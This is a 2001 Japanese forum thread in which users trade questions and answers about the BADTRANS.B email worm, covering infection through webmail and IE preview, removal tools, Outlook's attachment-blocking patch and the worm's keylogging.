POPサーバ使って手元のメーラーに落とすのじゃなく
ブラウザでメールの送受信するタイプ?
234220:01/12/04 21:47
>>233
そうです!
あれはフリーメールではなくwebメールというのですね・・・
完全に勘違いしてました。
ネット屋さん、231さん、ごめんなさい!!

WEBメールでウイルスを受信して、プレビューしてしまった場合、
ということで再度教えていただけないでしょうか。
二度手間お掛けしてすみません・・・
235ネット屋 ◆.t4dJfuU :01/12/04 21:48
>>233
なるほど。IMAP4か。IEで見たメールだと、さすがにOEにあるアドレス帳
は関係ないですよね。そか。ウカツだった。ウツ。
236名無しさん@お腹いっぱい。:01/12/04 21:49
ここの>>1で紹介されてる【病気のチェック】は
BADTRANS.B以外のウイルスもチェックしてくれますか?
>>236
一応できるよ。
238228:01/12/04 21:52
>>232
「BADTRANS.B」には感染していないんですね。
良かったです。
それではこのまま放っておいてOKですか?
IEで見て感染するか、は別にして
感染してしまえばOEが持ってる情報を使って
送信してしまうのでは?
240名無しさん@お腹いっぱい。:01/12/04 21:57
え、IEで見たメールも感染するんすか!?
ガビーソ
241【緊急事態発生】:01/12/04 22:00
通販のニッセンも被害にあいそうになったってメールきた。
感染した顧客から大量にニッセンサーバにウィルスきたんだと。
そんでこれはアカンとニッセンから対処方と説明のメール
送ってきた。
242ネット屋 ◆.t4dJfuU :01/12/04 22:01
>>234
病気メールをファイルとして保存して、それをエクスプローラで
見たとき、小さなプレビューが左上に出ます。それでも感染の
可能性があったみたいという報告がこのスレにありました。
と、すれば、IE上で当該病気メールを閲覧した場合、IE上で
感染活動が行われるのか?と言う部分に関し、すごく気になる
ところではありますが、とすれば、WEBサイトに何らかのシカケを
すると、SP2を当てていない閲覧者は直ちに感染するサイトが完成
してしまいます。と、ここで
http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-020
を見ると、

攻撃者はこのシナリオを次の 2 通りの方法で利用することができます。
まず、Web サイトで該当する HTML 形式の電子メールをホストし、別の
ユーザーにその Web サイトを訪問するように誘導します。この時点で
Web ページのスクリプトが電子メールを開き、実行可能ファイルを起動
します。または攻撃者が標的となるユーザーに直接 HTML 形式の電子メ
ールを送信します。いずれの場合でも、実行可能な添付ファイルが実行
された場合、これらの添付ファイルはシステムでのユーザーのアクセス
権のみに制限されます。

なるほど。WEB上でも感染するらしい。

と、すれば、WEBメール上でも感染する可能性があり、もし感染
すれば、アドレス帳にあるアドレスに病気を送る可能性はありそう
ですね。
243九州男 ◆8U2HuhRg :01/12/04 22:02
>214
それよりそこにあった民主党島議員のサイトの方に笑った。
Alizがサイバーテロだなんて。。。

思わずメールしちゃったよ。
恥ずかしいからやめなさいって・・・
インターネットの危機管理を訴えてる議員のパソが
そんなんじゃぁーあんたって感じ。
落ち着いたと思ってたのにぃ〜〜
3日ぶりに来た、BADTRANSちゃん♪
そぉ〜言えば、ラジオでBADTRANSのこと言ってたよ。

天気予報並に、ウイルス情報流してくれたら
こんなことも減るのかなぁ〜〜って思った
今日この頃です。
245  :01/12/04 22:26
>>243
あの議員さんはお笑いキャラ決定でありんす。
そもそもHTMLメール出すあたりで、ご本人のみならずマトモなブレーンも
周辺にいないこと丸分かり。

>>244
3日も来なかったならうらやましいよ。
やっと今日一桁になったんで、峠を越えたかなとほっと一息。
246+教えて君Delux:01/12/04 22:31
かかんないけど見てみたい。
ここでかけないようなことメールで教えて。
でもウィルスメールだめだよ。
247名無しさん@お腹いっぱい。:01/12/04 22:36
『Re:』メールで例の添付がついていたので、送信者に感染の旨を知らせました。
さきほど返事が来て『調べたけれど感染の事実はなかった』とか。
Macユーザーなので、一応ソースでアドレスやファイルの確認はしたのですが。
既に削除してしまったため記憶に頼ることになりますが、問題のメールの送信者
アドレスは空欄だったと思います。
これは、先方の勘違いでしょうか?
それとも、なにか別の機能が働いているのでしょうか?
定義ファイルが古いものだった、なんて落ちならいいのですが……。
248名無しさん@お腹いっぱい。:01/12/04 22:42
>>243
これって大丈夫なの?
http://www.simasatosi.com/cgi-other/
249名無しさん@お腹いっぱい。:01/12/04 22:53
http://headlines.yahoo.co.jp/hl?a=20011204-00000004-wir-sci

「MS『アウトルック』を安全にする「無料パッチ」:誰も使わないのはなぜ?
 米マイクロソフト社の『アウトルック』を、非常に安全性の高い電子メールソフ
トに変身させる、無料ダウンロード可能なアップデート用パッチがある。しかしこ
のパッチは、同社のウェブサイト上で1年以上も、事実上無視されるという憂き目に
あっている。
 最近のウイルス攻撃の多くには、電子メール以外の手段も使って感染を広めるワ
ームが使われている。問題のパッチ『 http://office.microsoft.com/Downloads/2000/Out2ksec.aspx
アウトルック・電子メール・セキュリティー・アップデート』(OESU)は、『バッド
トランス・B』や『サーカム』(SirCam)など、たいていの悪意あるコードによる被害
を防止、または大幅に減らすことができる。しかしこれは、ユーザーがこのパッチ
をダウンロードし、インストールすればの話だ。
(以下略)」

こんな記事を見たんですけど、このパッチどれくらいの効果があるんですか?
記事を読んでもよくわからないのですが。「非常に安全性の高い電子メールソフト
に変身させる」っていわれても・・・
しかもリンク先英語なんでインストールの仕方もわからないです。
誰かご存知の方教えてください。
厨房な質問でスマソ
250九州男 ◆8U2HuhRg :01/12/04 22:56
>245
えっ?htmlで送ってるの?どっかに書いてあった?

>248
意味わからん・・・
>>249
そのリンク先は、「Outlook」のパッチです。OEのじゃないですよ。

OutlookのE-mailセキュリティパッチはある意味究極のパッチです。
.exe、.pif、はては.mdbなんて拡張子のファイルを送りつけても
メール上には非表示にして使用不可にしてしまうのですから。

OEバージョンも出してくれないかなあ。
252249:01/12/04 23:03
>>251
すいませんあわてもんでよく読んでませんでした。
ありがとうございます。

ていうことは、OE版はないんですね。
やっぱりセキュリティを考えると電八とかに変えた方がいいのかなぁ。
でもアドレス帳とか、過去メールの移動が大変そうです。
経験者の方どうですか?
253蛇足ですが:01/12/04 23:06
「Outlook」のE-mailセキュリティパッチ導入で実行不可になるファイル拡張子

ADE、MDB、ADP、MDE、BAS、MSC、BAT、MSI、CHM、MSP
CMD、MST、COM、PCD、CPL、PIF、CRT、REG、EXE、SCR、
HLP、SCT、HTA、、SHS、INF、URL、INS、VB、 ISP、 VBE、
JS、 VBS、JSE、WSC、 LNK、WSF、 WSH
254名無しさん@お腹いっぱい。:01/12/04 23:06
一回前にこのウイルスに感染して駆除したんですよ。
んでその後また『Re:』のメール開いちゃったんですけど・・・。
んで一応トレンドマイクロ社の駆除ツールをもう一回使って・・・
その後オンラインウイルスチェックしたら毎回必ず
このプログラムは不正です。ってなってウイルスチェックができません。
これはどうすればいいんでしょうか?
まだウイルス残ってるってことなのでしょうか・・・?
>>254
シマンテックのツールでやってみましょう。
少し時間がかかりますけど。
256九州男 ◆8U2HuhRg :01/12/04 23:08
そういう事だったのか・・・>251
なんで削除しましたって出るのかって思ってた。
マカフィさんだめだな。
outlookにウイルス駆除されてるようじゃ・・・

ちなみにおれのはoutlook2000 SR-1 (9.0.04527)
これってそういう事でいいですかね?
>243,>245,>248
あなたたち、すげぇよ!
よくもまぁ、探し出して晒してくださいました。

だいたい添附ありメールをブラウズしてワーム感染したんでしょ?
それをサイバーテロ攻撃って(゚Д゚)ハァ?
こういう知識で「サイバーテロ立法」を叫んでも
説得力ないし、それどころか恐ろしさを感じるね
プログラマ(って優香htmlが手打ちできる人)もサイバーテロリストにされかねない
248もソース見たらHomePage Builderだったりするし
>>256
SR-1+セキュリティパッチ適用だとするとそうです。

私は会社でOutlook使ってまして、このパッチが適用されるときに、
「何でも実行不可にすればいいといいと思ってんじゃねぇ!」
と思いましたが、実際添付ファイルを不用意にクリックする人
は確かに多いので、これによってある程度のウイルス感染
は抑止されたんじゃないかと思います。

対象ファイルを送る時は、仕方ないので拡張子を変更して
送って、相手に保存時にもとに戻すようにして貰ってます。
259名無しさん@お腹いっぱい。:01/12/04 23:16
で、届いた添付ファイルからキーログとかを
抜き出すにはどうすればいいの?
260257:01/12/04 23:17
>250
248を開いたらディレクトリが見えませんか?
そこの20001220_add.cgiをクリックすると…

なおHomePage BuilderはParent Directoryね
>>259
キーログは添付されてくるものではないと思われ。
262九州男 ◆8U2HuhRg :01/12/04 23:19
>257
メールに書いときました。(w
ニムダであんだけ報道されたのに何の対策も講じてない
なんて・・・なんてって感じ。
しかも二次感染までさせてるし。

がんばって下さいって書いときました(w
こわくてクリックできん(プルプル
ttp://www.simasatosi.com/cgi-other/data/
264名無しさん@お腹いっぱい。:01/12/04 23:30
win2000で管理者権限で複数ユーザーが1台のPC
使っているんですが(家族です)感染すると
他のユーザーの登録アドレスにまで、送信するのですか?
265+教えて君Delux:01/12/04 23:35
ウィルス送らないでね。
しかし、見えますよってメール出したら
おまえサイバーテロリストだろ、って反対に警察に訴えられるかもしれないね
メールアドレスから”犯人”を特定できるし┐(;'ー`)┌
267名無しさん@お腹いっぱい。:01/12/04 23:36
>242

えー!
私もWEBメールに来たけど、WEB上でプレビューしてしまいました。
そのアドレスは使わないようにした方がいいのでしょうか?
誰からも「ウィルス来た」という知らせはないのですが、送信しているのでしょうか?

BADTRANS来た時点で送受信メールは残ってませんでしたし(読んだらハードディスクに
保存して、WEB上では速攻削除してたので)アドレス帳にも何もなかったはずですが・・・
268+教えて君Delux:01/12/04 23:39
むにゅがなんでこんなこと書くのかというと、
TROJ_HYBRIS.Mにやられたんだにゅ。
このメアドは、2chと他某所でしか公開してないはずだにゅ。
誰か見て勝手にアドレス帳にでもいれてくれたようだにゅ。
こんど送ってきたら許さんにゅ。わかったかにゅ。
BADTRANSなんかさらにヤバーイにゅ。お願いにゅ。じゃーにゅ。
バイバイ。
269九州男 ◆8U2HuhRg :01/12/04 23:40
>260
ちがうディレクトリにはもっと怖いものも
乗っかっちゃってる気がするが・・・
270名無しさん@お腹いっぱい。:01/12/04 23:41
>>267
アドレスは関係ありません。感染するのはPCなので。
感染したか不安ならツールを使ってチェックすることをお勧めします。
>>269 (゚Д゚)ハァ?
272名無しさん@お腹いっぱい。:01/12/04 23:42
>263
まじで厨房だよ・・
273267:01/12/04 23:47
>270
あ、パソコンなら大丈夫だと思います・・・
一通りのことはやりましたし、もともと5.5SP2だったし・・・
MLやメルマガいっぱいとってるけど誰からも知らせ来ないし

・・・WEBメールアドレスのサーバーが感染しちゃったとか、
そういうことはないんですよね?
274名無しさん@お腹いっぱい。:01/12/04 23:48
マカーなんで放っといたんですが、だんだん数がたまってきました。
普通に捨てちゃっていいんでしょうか?
>>274
捨ててヨシ!
276206:01/12/04 23:52
遅レス済みません。

>210
そういう事もあるのですね…
とりあえずファイルは削除してしまいました。

>219
ウイルスバスターを終了させても、なります。
ただ、なる所とならない所があって、ヤフーやグーグルではなります。
2chでも固まるスレと、すんなり書き込めるスレがあるので
サーバーで違うんでしょうかねぇ…?
あと、フォームの履歴が反映されなくなりました。
277名無しさん@お腹いっぱい。:01/12/04 23:54
>>273
無いと思って良いです。
278名無しさん@お腹いっぱい。:01/12/04 23:58
ちょっと確認したいんだが、
感染した際に送信しちまう可能性があるのは、
1. OEの受信トレイにある「未読」メールの送信者アドレス
2. IEのキャッシュフォルダにあるファイル中で見つけたアドレス
でいいんだよな?

・ OEの受信トレイにある「既読」メールの送信者アドレス
・ アドレス帳のアドレス
なんかは、送る可能性無しだよな?

このスレ全部見てるつもりなんだが、ガイシュツだったら悪い
279名無しさん@お腹いっぱい。:01/12/04 23:58
Kernel32.exeの中にAOLかどっかの鯖のアドレス(ネームサーバーだったかな)
があったような気がしたけど、あれは何に使ってんの?現物ないから
確かめられんし、今更解析したくない。誰か教えてくれ
280  :01/12/05 00:01

>>250
ちょっと遅くなったけど、今日見たスラッシュドット
http://slashdot.jp/article.pl?sid=01/12/04/0730229&mode=thread
> お詫びと注意を呼び掛けるメールを相変わらずOEのHTMLメールで送信した。
議員の話はこっち↓でやれ

そうです議員さん アンタは偉いよ。
http://pc.2ch.net/test/read.cgi/sec/1007372711/l50
282名無しさん@お腹いっぱい。:01/12/05 00:21
感染中にパスワードなどを打ち込まなかった場合は、
情報が漏れることはないんでしょうか?
念の為パスワード等の変更はするべきですか?
>>282
しておいた方がいい。
できることはなんでもしておこう。
284ネット屋 ◆.t4dJfuU :01/12/05 00:35
>>264
情報がそこまでないです。理屈の上では関係ないと思うのですが。
>>267
IE5/5.5のSP2を当てれば大丈夫かも。
>>278
そう、聞いています。
285名無しさん@お腹いっぱい。:01/12/05 00:39
>>283
ありがとうございます。
あと、ユーザー登録しているサイトなどの
個人情報は大丈夫なんでしょうか?
286ネット屋 ◆.t4dJfuU :01/12/05 00:48
>>285
そのあたりは関係ないと思います。
287名無しさん@お腹いっぱい。:01/12/05 00:55
ネット屋さん、レスありがとうございます。
これで安心して眠れます。。
288名無しさん@お腹いっぱい。:01/12/05 01:38
送られてくるメールの中に、メアドの@より前の部分が48文字もある
メアドがあった。
dionって、こんな長いのもOKなのか?
数える俺も暇人だ..。
289名無しさん@お腹いっぱい。:01/12/05 01:57
CIA辺りが、テロリストを見付け出すためにビールスを故意に
流しているのかな。先月中頃から急激に広まり、送り付けられる
様になったのでWTCテロ後の時期と一致している。考え過ぎかな。
290名無しさん@お腹いっぱい。:01/12/05 02:01
来るは来るは、総数にすると700通位もらってます。

その中に件名が「Re: Re: Mr.MEATフ、ワ「IT[CXe[LD�隱ニ、イエ「ワオスI」」
こんなのありました。
文字化けしてるけど、とにかく「RE:2つ付き」で来たのはこれ1通のみ。
また、これが届いたメアドは普段ネットサーフィンでは使っておらず、
実際そのメアドに来たBADTRANS.Bメールは、それ1通のみ。
(別の3つのメアドに、700通来てます)
RE:RE:の送信者は知らない人です。

だから、なんだかわざわざ手動で送って来たような気がして、キモイし鬱。
「RE:RE:タイトル」で来てるBADTRANS.Bもよくあるんですか??

あ、ちなみに、私は感染しておらず、私のPCから送られたウイルスメール
に返信が来たわけではありません。送信者は知らない人です。
291219:01/12/05 02:03
>>206
感染したのってBADTRANSだったよね。だとしたら感染活動が派手な割に、駆除
ツール使えばきれいに抜ける、システムにも影響残さないってのが自分の印象
なんだけど。
違ってたらご指摘ください。>>ALL

感染前と後で環境変わったのがウイルスバスターだけだったら、自分はそれを
疑うけどなあ。失礼なこと聞くけど「常駐」って意味わかるよね?バスター
よく知らんけど、多分右下のトレイの中にアイコン出てると思う。それも
終わったんだよね?
あとはたまたま当該のホームページが混んでただけとか。まあ、ウイルスは
駆除できたようだし、2,3日様子を見るのが正解かも。
292名無しさん@お腹いっぱい。:01/12/05 02:07
>>290
>>98に似てるな。
IE4は確認されてないんですよね?
Win98SP1なので
・Win98/IE4で再インストール
・Microsoft関係のページのみブラウズ←なんかメアドのあるページ
でテストしてみようかな?
ヒトには迷惑かからんし(w
>>293
自分はNIMDAんとき、Win98+IE4SP2で感染したっす。
BADTRANSも基本的には同じ構造らしいから感染すると思うっす。
295293:01/12/05 02:20
>>294 さん
ありがとう。やさしいんですね。
確認もしないMicrosoftに強制的に確認してもらおうかと思いまして。
たま〜にしか使わないおっさん、おばはんのPCとかに
残ってそうじゃないですか(笑)>IE4
それを確認しないつーのは製造者としてどんなものかと>MS
>>293
MS製品を使っている時点で矛盾
297名無しさん@お腹いっぱい。:01/12/05 02:26
>自分はNIMDAんとき、Win98+IE4SP2で感染したっす。
まじ?
IE5使いにくいからIE4(SP2)に戻そうかと思ってたのに・・・・。
298290:01/12/05 02:28
>>292
おお!全部見てたつもりで、気づいてなかった。スミマセン^^;)
すると>>98が答え?

こちらからメール送信はしてないはずなんで、余計に気持ち悪いような...
あ、もしかして楽〇〇ックスで本買ったときにこのメアドを使ったかも。
でもそこから来たんなら、さらにタダごとでないような。
......なぞは深まるばかりです。
299名無しさん@お腹いっぱい。:01/12/05 02:28
IE5.0から5.5へアップグレードしようと思うのですが、
お気に入りフォルダなどの内容も初期化されてしまうのでしょうか
300206:01/12/05 02:31
>219=291

常駐は分かります、大丈夫です(笑)
タスクトレイから右クリで終了させてますから。
駆除ツール2種共に実行しましたので、多分駆除はされているとは思いますが
様子見てみますね。
レスありがとうございました。
301294:01/12/05 02:32
>>295
>確認もしないMicrosoftに強制的に確認してもらおうかと思いまして。

たぶんすでに痛いほど確認しまくってると思われます。
個人サイトでも数百件くる人がいるんだから、多分何万件ときていると思われ(w

おっさん、おばさんはバッチ当ててないでしょうね〜。いまだにIE3だったり
なんかして。そんでかえって安全だったりして。
302名無しさん@お腹いっぱい。:01/12/05 02:35
で、BADTRANS.Bをばらまいたのは、脳トンですか?氏万テックですか?
303名無しさん@お腹いっぱい。:01/12/05 02:35
やっぱりネスケだね♪
304名無しさん@お腹いっぱい。:01/12/05 02:36
>>302
同じやろ<脳トンと氏万テック(w
305名無しさん@お腹いっぱい。:01/12/05 02:38
初めてウィルスメールがきたので、これはやばいと
思い、定義ファイルをアップデートしなくては! と
アプデートしようとしたら
「定義ファイルの無料購読期間が切れました云々…」



・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・(;´Д`)イヤーソ
306名無しさん@お腹いっぱい。:01/12/05 02:40
>299
スレ違いな質問だけど、答えとく。
「お気に入りフォルダの中身は引き継がれる」

以上。
307愛で空がお味噌汁:01/12/05 02:41
>>299
大丈夫(なはず)
心配なら、windowsフォルダの中のFavoritesフォルダを
バックアップ汁。
308293:01/12/05 02:48
>>295さん
>たぶんすでに痛いほど確認しまくってると思われます。
ですね(w
でも書いてみてよかったっす>>297さんみたいな例もあることだし。
私にとっては貴重な情報でした。ありがとうございました。

>>296さん
御意。
でもシゴトとなると使わにゃならん場合もあるんよ>MS製品
いきなりWORDとかExcelのファイル添付してくるバカもおるし
#取引先にゴルァとかいえねーですぜ(w
309294:01/12/05 02:50
>>297
まじっす。メールからじゃなくてホームページ見て感染したんだけど。
しっかりreadme.exeダウンロードしちゃいました(泣

NIMDAんとき、IE4は最初バージョンアップの対象になってなかったのが
途中で追加されたっすよね?どうも特定の環境では感染しないことが
あるらしいっす。ただ、IE4自体のバージョンと他のアプリの導入状況が
複合的に関連してくるので、MSが説明がめんどくさくなって一律ダメって
ことにしちゃったらしいです。昔なんかで読んだけど、ソースが見つからない。
知ってる人います?

自分もNIMDAさえなければIE4のままだったっす。安定してたのに・・・。
>>306-307
回答ありがとうございます
311293:01/12/05 02:58
いけね>>308大間違い(w
>>294さんへ、でした。自分(295)にさんづけしてるよ。アホかい(爆)
スレ汚しスマソ。
>>308
MS OfficeだけのためにWindowsを使う必要はないですよ。
Sun Suiete6をおすすめします。
↑どーでもいいことだがsuiteじゃねーのか
もうだめぽお
ウチにもBadtrans来ました。初ワームメール受信。
Yahooメール宛てだったんでプレビュー問題も意味なし。

つか、せっかくだからFDに隔離保存(wしようと思ったが、
Yahooメールって添付ファイルを他のメアドに転送できんのね。
ちょっと悔しい(w
316ネット屋 ◆.t4dJfuU :01/12/05 07:58
>>315
病気によっては転送できないものもあるようです。ALIZのときは
オリジナルは7Kあったのに、転送すると送信済みトレイには7K、しかし
送信先には2Kで病気なしで届きました。くやしいので、メールを丸ごと
添付して送信しましたが、やはり2K。頭にきたので、病気メールを
デスクトップに保存し、LZHで圧縮して添付送信したところ、やっと
送ることが出来ました。MIMEの中身が不思議なんでしょうね。
BADTRANS.Bもそうかどうかは判りませんが。
317七菜詩:01/12/05 08:26
BADTRANS.Bメールを寄越した友人にその旨を伝えたところ
パニックになってしまい、ウィルスバスターを入れても
駆除できない、助けてくれ〜とSOSが来ました。
状況はウイルスバクスターの最新バージョンでも
駆除・隔離ができず、感染ファイル名が
C\WINDOWS\SYSTEM\DLL.DLLと表示されており、
OSにもdesk top表示とかいろいろ影響がでて、
そもそもインターネットも出来ない状態になっているそうです。
ノートン使用者でウィルス感染経験のない私には分からないのですが
この場合、力技でC\WINDOWS\SYSTEM\DLL.DLLを削除しても
システムの運用上問題無いものなのでしょうか?
オンラインでトレンドマイクロ社の駆除ツールを教えても
既にウィルスバスターを入れた後だったので試してはいないようですが
もう一度試すように連絡した方がいいのでしょうか?
教えてちゃんで誠に申し訳ありませんが、御教授頂きたく
どうぞよろしくお願い致します。
318∩(^^ ):01/12/05 08:35
319名無しさん@お腹いっぱい。:01/12/05 08:43
>>317
HDをフォーマットしてOSを再インストール、
即アンチウイルスソフト入れ直し
320名無しさん@お腹いっぱい。:01/12/05 08:55
>>317
アンチウイルスをアンインストールして
(セーフモードで起動してやるんでしたよね?)
もう一度入れ直して見るか、
アンインストールしてからノートンの入れてみるか、
それ試してだめだったら>>319のようにする・・・というのではだめなのかな・・・
>>317
ウィルスバスター飼ったのなら、
1.ウィルス定義ファイルを更新する
2.ユーザーサポートへ電話する。
ダメなら
3.過去スレに隅々まで目を通す。
4.トレンドマイクロのフリーツールを使う
5.諦めて再インストール……

一度感染してしまったのなら、
OSをクリーンインストールしなおした方がいいのはいいのだ。
>>290
私は知り合いから「Re:(後文字化け)」というウイルスメール来たよ。
そういう場合もあるんじゃないかなあー。

自分は最大限の防御しといて、あまり相手に不信感もたんでおきましょーよ
323名無しさん@お腹いっぱい。:01/12/05 09:52
なんかまた新種ウイルスが出たらしいです。

速報版
http://news.2ch.net/test/read.cgi/news/1007512699/l50
324名無しさん@お腹いっぱい。:01/12/05 10:10
OE5を使っていて、まだウィルスメールは来ていなかったけれど
ウィルス対策としてプレビューウィンドウのチェックを全部外しておいた。

すると受信したメールを開こうとすると強制終了になってしまう。
MSIMN のページ違反らしいのですが・・・。アドバイスキボンヌ。
325  :01/12/05 10:47
>>324
OEやめる。いやマジで。
とりあえず、一時的にでも他のメーラーを使って
確認してみたらどうだろうか?
あるいは、Webメールに転送して見られないか?
326スレ違いですが:01/12/05 10:48
328nananasi:01/12/05 11:39
OEを一度も使ったことがなく、ウィルスバスターも反応しないんだけど、
誰かの自動応答がメアドに返ってきていた。

こういうのってあり?
>>328
さっき某航空会社からこんなの来た。
Time:11:04:19
Subject: Virus Alert
Have detected a virus (WORM_BADTRANS.B) in your mail traffic on 12/05/2001 11:03:03 with an action delete.

適当に読んで、一瞬「え、私感染してたの!?」と焦ってノートン先生とか
トレンドのBadtrans駆除ツールを使ってみたんだけど、見つからず。
わけがわからなくなってSubjectの内容でGoogle検索してみたら、
あるMLの過去ログに同じ文面のものが大量に存在していた。

要するに、「あんた宛のメールにBadtransが添付されていたので
削除したよ」ってことらしい。
アクセス解析をあさってみたら、その会社のドメインがあったので、
キャッシュのアドレスに送ってきたパターンがの送信サーバ側でブ
ロックされたらしい。

すいません、もっとわかりやすい英文にしてください。<アンチ
ウイルス会社
330159:01/12/05 11:59
遅レスです。帰宅後確認したのですが、protocol.dllは残っていました。
というわけで、BADTRANS.BをTRENDMICROのオンラインスキャンで駆除した
場合は、protocol.dllは削除されずにWINDOWSのシステムディレクトリに残ります。

で、>>278さんですが、私の場合未読メールが無いにも関わらず、
既読メールの送信元アドレスにも感染メールが送信されてしまいま
した。(アドレス帳上にはないアドレスでした。IEキャッシュとも
無関係のアドレスです)

そこで、今回BADTRANS.Bに感染してしまい、「誰に感染メール送っちゃった
か知りたい」という人は、

1.protocol.dllファイルを検索(通常C:\WINDOWSにある)
2.残っていれば>>108 >>147を参考にして、MBAKER2でprotocol.dllをデコード

 という手順で感染メールの送信先を特定できます。

 もし間違いがあったらフォローお願いします。>>ALL
331名無しさん@お腹いっぱい。:01/12/05 12:07
サイトのメール自動配信を登録していて、
毎日必ず届いてたんですが、さっぱり来なくなりました。
感染していたことと関係あるんでしょうか?
>>331
もしアンタがそのサイトの管理者だったらどうするかね?
333名無しさん@お腹いっぱい。:01/12/05 12:34
>>332
そうですね、すみません。
じゃあ、そのサイトに感染メール送ったということですね…
>>333
感染メールが送られてきたので、配信を止めたんじゃないでしょうか?
管理者に謝罪兼質問してみそ。
335333:01/12/05 13:05
>>334
そうですね、ありがとうございます。
問い合わせしてみます。
336317:01/12/05 14:45
319さん、320さん、321さん
早々のお答えをありがとうございました。
割と簡単に駆除出来そうに思えるワームですが
友人の所の様にこじれてしまったら
もうOS再インストールするのが一番なのですね。。。
そう伝えておきます。
ありがとうございました。
337名無しさん@お腹いっぱい。:01/12/05 14:48
感染中に入力したパスワードが漏れてしまうとのことですが、
パスワードを自動認証してくれるサイトのパスワードも漏れてしまったのでしょうか?
それとも、直接キー入力したものだけですか?
338九州男 ◆8U2HuhRg :01/12/05 15:12
>337
多分漏れる?
ってかパスワードを自動認識って?

その時点で既にセキュリティてきにあんまりどうかと・・・
339名無しさん@お腹いっぱい:01/12/05 15:22
自動認識は全部解除しています。
これの時点で安全性と言う点ではかなり危険なので。
その代わり、別の場所にPassWordを書いていますけど。
もう少し私の記憶力が鍛えられていれば、書く事も無く、事実上最強になるのですけどね。
ああ、記憶力の良い人が羨ましい。
友達にランダムの十数文字のアルファベットと数字の混在したPassWordを
数回繰り返し発音しただけで、覚えられる人がいる。
340名無しさん@お腹いっぱい。:01/12/05 15:30
>>338 >>339
なんか、サイトにアクセスしただけでログインできるんです。<自動認証
セキュリティを考えたら、確かに危険ですよね・・・
楽なんでついそのままにしていました。
この機会に自動認識は解除することにします。
ありがとうございました。
341名無しさん@お腹いっぱい。:01/12/05 15:35
>>337
特定のキャプションのついたウィンドウが出来ると、それから30秒間(だっけ)
キー入力を監視する。なんで漏れてない。
342名無しさん@お腹いっぱい。:01/12/05 15:40
これはどう解釈するの?

http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
001 すべてのウィンドウ内のテキストをログに記録する
002 キーログを暗号化する
004 ログファイルをワームファイルに含まれているアドレスリストの1つに送信する
008 キャッシュされているパスワードを送信する
343名無しさん@お腹いっぱい。:01/12/05 16:13
はじめてウィルスに感染した初心者です。どなたかおしえてください。
シマンテックのオンラインウィルスチェックをしたところ
バットトランスに感染していると出ました。なので駆除ツールをダウンロード
して駆除したのですが、もう一度ウィルスチェックをすると

c:\WINDOWS\kdll.000 は 次のウィルスに感染しています:
W32.Badtrans.B@mm

とでるのです。うちのパソコンはまだ感染しているのでしょうか?
344343:01/12/05 16:18
トレンドマイクロのオンラインウィルスチェックをすると
感染していないとでます。
>>343
再起動した?

とりあえず、感染してると言われたファイルを消せ。
346343:01/12/05 16:37
>>345
再起動はしました。
感染しているファイルはどうやって消すんですか?
削除するだけじゃん。
その方法が分からないの?
348343:01/12/05 16:47
>>347
普通に削除すればいいんですか?
349名無しさん@お腹いっぱい。:01/12/05 16:56
>>330

うちにも来た。
ビクーリした。そういうことか。サンクス。
350ネット屋 ◆.t4dJfuU :01/12/05 16:56
>>342
それらの状態を遷移すると言う意味のようですね。
遷移のタイミングがはっきりとは書かれていないので、
詳細なところまではわかりませんが。
>>348
そう思います。拡張子が違っているので酷い悪さはしないと思いますが、
削除しちゃいましょう。
351343:01/12/05 17:00
>>350
わかりました。
ありがとうございます。
352 :01/12/05 17:08
お詫びメールが来たんだけど、やっぱCCメールでした(w
携帯番号そのままのメアドまで晒してやがる・・・(;´Д`)
>>352
マナーサイトでも教えてあげましょう。
感染メールに丁寧に警告メールを返していたのだけど、
お礼のメール0・・・
せめてこのウィルスでどれだけみんな困ってるかを知ってもらうために、
このスレのアドレスだけ教えるようにしました。
ちゃねらーとばれたってかまうもんか・・・
355名無しさん@お腹いっぱい:01/12/05 18:40
>>354
私も何回かウィルスメールを故意にではなく、感染して送ったのだろうと思われる人に教えましたが、
お礼のメールは貰った事無いです。まぁ。貰うために書いているのではないので、良いんじゃないですか?
それいらい、来ない所をみると、こちらのメールは読んでくれているみたい。

むしろ、「けしからん」と言って、今度からウィルスメールを貰っても何もしない方が、
広がるのを助けることになってしまいますから。
それにしても、やっぱりアップデートって知らない人が多いのにはびっくりしました。
「SP2かIE6.0にしなはれ」「何それ?」と言われたし…(;w;/
356名無しさん@お腹いっぱい。:01/12/05 18:45
>354-355
私は「返信は不要です」と最後に付け加えているよ
ウィルス付のお礼メールや問い合わせメールなんて
欲しくないし、簡単に感染してそれに気付かない人は
自分がウィルスに感染してパニックになっているだろうと思うから
357名無しさん@お腹いっぱい:01/12/05 18:49
>>356
おお。ちゃんと丁寧に末文につけているのですか。
確かに、良く考えると、こちらはウィルスだとわかっているから「あらら、まただ」ですけど、
ウィルスに感染してしまった人の方は「なんで?」ですもんね。
なるほど。私も、今度から文章の最後にメールアドレスと名前をつけてる所に書いておこう。
パスワード漏れてるかもyo!と言って送ったら、3通のうち2通お礼が
返ってきた。でも別に礼はいらんので、以後は返答不要と書いてる〜。
でも教えてあげるのは、気が向いた時だけね…。
359名無しさん@お腹いっぱい。:01/12/05 19:07
何でだろうな、オンラインスキャンが全然駄目。
いくらやってもアクティブXが有効じゃないと出る。
IEのセキュリティを中にして、オミトロンもFWも
切ってやってみたけど全然駄目。なんで?
Win2k sp2&IE6
360名無しさん@お腹いっぱい:01/12/05 19:09
IE5,5とIE6,0にセキュリティーホール修正パッチが11月中旬に出ていたからな。
俺はもう適用させたけど、してなかったらしておいた方が良いと思う。
クッキー関係のだから。
361WINDOWS CE:01/12/05 19:09
今使ってるPCのOSは、WINDOWS CEの2.0なんやけど、
これもプレビューだけで感染するかなぁ
機種はシャープのテリオスです
362名無しさん@お腹いっぱい。:01/12/05 19:10
俺も時々、IEの機能を制限したりつかったりするけど、
切り替えがうまくいかないときとかあるよね。
そう言う時は、諦めるか、再起動するかだよ。
363aaaa:01/12/05 19:56
感染したので駆除ツールを使ったのですが、
オンラインスキャンしたらまだ感染ファイルがあります。
こんな事ってあるんですか?
それとも、他のウィルスに感染しているんでしょうか?

因みに今は友達のPCから書き込んでます。
364名無しさん@お腹いっぱい。:01/12/05 20:52
>>363
感染して駆除ツールを使ったと言う事は、なんのウィルスかはわかっていたんだよね。
なら、オンラインスキャンで出てきたウィルスが自分が消した筈のウィルスと同じ名前かを見て、わかるはずだけど…。
365名無しさん@お腹いっぱい。:01/12/05 20:53
オンラインスキャンは名前、出ないの?
